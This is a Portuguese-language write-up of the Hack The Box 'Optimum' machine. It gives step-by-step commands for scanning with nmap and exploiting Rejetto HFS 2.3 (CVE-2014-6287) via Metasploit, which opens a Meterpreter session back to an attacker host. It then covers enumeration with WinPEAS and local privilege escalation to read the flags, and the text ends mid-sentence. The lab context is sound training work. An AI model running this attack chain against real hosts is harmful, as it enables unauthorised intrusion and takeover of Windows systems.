
Writeup da máquina Optimum do Hack The Box. Este passo a passo cobre a exploração do Rejetto HttpFileServer 2.3 (CVE-2014-6287) para obter acesso inicial, seguido de escalonamento de privilégios em um host Windows usando técnicas de enumeração e ferramentas de pós-exploração.
Nesta máquina, o objetivo é obter acesso inicial a um host Windows explorando um serviço web vulnerável e depois escalar privilégios para obter a flag de administrador.
O caminho de ataque envolveu:
Começamos com uma varredura completa de portas TCP para identificar serviços expostos.
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>
A varredura revela a porta 80 aberta.
Em seguida, realizamos uma varredura de serviço e versão.
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>
O resultado identifica o seguinte serviço:
HttpFileServer 2.3
Este serviço corresponde ao Rejetto HTTP File Server, um servidor web leve para compartilhamento de arquivos.
Após pesquisar a versão detectada, descobrimos uma vulnerabilidade conhecida:
CVE-2014-6287
Esta vulnerabilidade permite execução remota de código devido à sanitização inadequada de entrada.
Para explorar a vulnerabilidade, usamos o Metasploit.
Inicie o Metasploit:
msfconsole -q
Pesquise pelo módulo apropriado:
search rejetto
Carregue o módulo de exploit:
use exploit/windows/http/rejetto_hfs_exec
Configure as opções necessárias:
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run
Uma vez executado, o exploit fornece uma sessão Meterpreter na máquina alvo.
Com a sessão Meterpreter obtida, navegamos pelo sistema de arquivos para recuperar a flag de usuário.
cd
cat user.txt
whoami
A saída do comando mostra que estamos logados como:
kostas
Como este usuário não possui privilégios administrativos, prosseguimos com a escalação de privilégio.
Para identificar potenciais vetores de escalação de privilégio, fazemos upload do WinPEAS, uma ferramenta bem conhecida de enumeração para escalação de privilégio no Windows.
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
Em seguida, executamos:
shell
.\wp.exe
A saída revela informações úteis, incluindo credenciais associadas ao usuário kostas.
Após revisar possíveis vetores de escalação, usamos o módulo do Metasploit:
local_exploit_suggester
Carregue o módulo:
use post/multi/recon/local_exploit_suggester
Configure a sessão:
set SESSION <SESSION_NUMBER>
run
Este módulo sugere possíveis exploits locais que podem ser usados para escalar privilégios.
Após escalar privilégios com sucesso, obtemos um shell com direitos administrativos.
Verificação:
shell
whoami
Uma vez obtidos os privilégios administrativos, navegamos até o diretório do Administrador para recuperar a flag root.
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
Esta máquina demonstra vários conceitos importantes de teste de penetração: